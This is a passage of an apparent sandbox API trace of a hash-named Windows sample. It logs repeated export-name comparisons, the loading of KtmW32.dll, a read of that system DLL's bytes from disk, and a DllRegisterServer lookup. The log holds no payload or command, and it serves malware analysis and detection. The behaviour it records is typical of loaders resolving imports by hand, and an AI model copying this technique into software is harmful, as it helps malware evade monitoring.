returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0092.665] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0093.380] GetProcessHeap () returned 0x440000 [0093.380] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4032040 | out: hHeap=0x440000) returned 1 [0093.387] GetProcessHeap () returned 0x440000 [0093.387] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x4591a0 [0093.387] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0093.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0093.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0093.881] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0093.881] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0093.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0093.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0093.881] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0093.881] GetProcessHeap () returned 0x440000 [0093.881] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x5e00) returned 0x2c75030 [0093.882] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0093.882] ReadFile (in: hFile=0x17c, lpBuffer=0x2c75030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c75030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0093.884] CloseHandle (hObject=0x17c) returned 1 [0093.884] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0093.884] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0093.884] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0093.884] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0093.884] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0093.884] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0093.884] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0093.884] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0093.884] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0093.884] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0093.884] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0093.884] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0093.884] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0093.884] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0093.884] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0093.884] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0093.884] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0093.884] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0093.885] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0093.885] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0093.885] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0093.885] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0093.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0093.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0093.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0093.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0093.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0093.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0093.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0093.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0093.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0093.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0093.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0093.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0093.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0093.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0093.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0093.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0093.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0093.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0093.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0093.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0093.887] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0093.887] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.887] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0093.887] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0093.887] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0093.887] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0093.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0093.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0093.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0093.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0093.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0093.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0093.889] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0093.890] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0093.890] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0093.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0093.891] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0093.892] GetProcessHeap () returned 0x440000 [0093.892] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c75030 | out: hHeap=0x440000) returned 1 [0093.902] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0093.902] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0093.902] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x1000) returned 0x2c75030 [0093.904] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x24) returned 0x448660 [0093.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DllRegisterServer", cchWideChar=-1, lpMultiByteStr=0x448660, cbMultiByte=36, lpDefaultChar=0x0, 